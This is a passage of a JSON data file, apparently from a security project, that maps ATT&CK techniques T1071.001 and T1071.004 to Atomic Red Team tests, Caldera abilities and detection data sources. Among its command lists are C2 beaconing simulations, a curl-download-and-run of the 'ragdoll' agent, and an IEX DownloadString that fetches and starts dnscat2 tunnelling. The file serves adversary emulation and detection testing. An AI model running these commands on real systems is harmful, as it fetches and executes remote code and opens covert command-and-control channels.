user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/file/1080281/download", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1071.001", + "command_list": [ + "Invoke-WebRequest www.google.com -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"*<|>*\" | out-null\n", + "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 www.google.com >nul 2>&1\n", + "C:\\Windows\\System32\\Curl.exe -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "curl -s -A \"HttpBrowser/1.0\" -m3 www.google.com\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com\ncurl -s -A \"*<|>*\" -m3 www.google.com\n", + "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n" + ], + "commands": [ + { + "command": "Invoke-WebRequest www.google.com -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"*<|>*\" | out-null\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 www.google.com >nul 2>&1\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "curl -s -A \"HttpBrowser/1.0\" -m3 www.google.com\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com\ncurl -s -A \"*<|>*\" -m3 www.google.com\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "source": "data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml", + "name": "A Python agent which communicates via the HTML contact" + }, + { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "source": "data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml", + "name": "A Python agent which communicates via the HTML contact" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1071.001", + "display_name": "Application Layer Protocol: Web Protocols", + "atomic_tests": [ + { + "name": "Malicious User Agents - Powershell", + "auto_generated_guid": "81c13829-f6c9-45b8-85a6-053366d55297", + "description": "This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. \nUse an application such as Wireshark to record the session and observe user agent strings and responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "www.google.com" + } + }, + "executor": { + "command": "Invoke-WebRequest #{domain} -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"*<|>*\" | out-null\n", + "name": "powershell" + } + }, + { + "name": "Malicious User Agents - CMD", + "auto_generated_guid": "dc3488b0-08c7-4fea-b585-905c83b48180", + "description": "This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. \nUse an application such as Wireshark to record the session and observe user agent strings and responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "www.google.com" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system \n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.71.1-win32-mingw\\bin\\curl.exe #{curl_path}\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "command": "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Malicious User Agents - Nix", + "auto_generated_guid": "2d7c471a-e887-4b78-b0dc-b0df1f2e0658", + "description": "This test simulates an infected host beaconing to command and control.\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "www.google.com" + } + }, + "executor": { + "command": "curl -s -A \"HttpBrowser/1.0\" -m3 #{domain}\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain}\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain}\ncurl -s -A \"*<|>*\" -m3 #{domain}\n", + "name": "sh" + } + } + ] + }, + { + "id": "0ab383be-b819-41bf-91b9-1bd4404d83bf", + "name": "Ragdoll", + "description": "A Python agent which communicates via the HTML contact", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1071.001", + "name": "Application Layer Protocol: Web Protocols" + }, + "platforms": { + "darwin": { + "sh": { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "cleanup": "pkill -f ragdoll\n" + } + }, + "linux": { + "sh": { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "cleanup": "pkill -f ragdoll\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1071.004", + "command_list": [ + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"TXT\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + null, + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\" -QuickTimeout}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain example.com -DNSServer #{server_ip}\n", + "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer 127.0.0.1\n" + ], + "commands": [ + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"TXT\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": null, + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain example.com -DNSServer #{server_ip}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer 127.0.0.1\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1071.004", + "display_name": "Application Layer Protocol: DNS", + "atomic_tests": [ + { + "name": "DNS Large Query Volume", + "auto_generated_guid": "1700f5d6-5a44-487b-84de-bc66f507b0a6", + "description": "This test simulates an infected host sending a large volume of DNS queries to a command and control server.\nThe intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_volume": { + "description": "Number of DNS queries to send", + "type": "Integer", + "default": 1000 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "name": "powershell" + } + }, + { + "name": "DNS Regular Beaconing", + "auto_generated_guid": "3efc144e-1af8-46bb-8ca2-1376bb6db8b6", + "description": "This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.\nThis behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "runtime": { + "description": "Time in minutes to run the simulation", + "type": "Integer", + "default": 30 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "c2_interval": { + "description": "Seconds between C2 requests to the command and control server", + "type": "Integer", + "default": 30 + }, + "c2_jitter": { + "description": "Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests", + "type": "Integer", + "default": 20 + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "name": "powershell" + } + }, + { + "name": "DNS Long Domain Query", + "auto_generated_guid": "fef31710-223a-40ee-8462-a396d6b66978", + "description": "This test simulates an infected host returning data to a command and control server using long domain names.\nThe simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.\n Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name 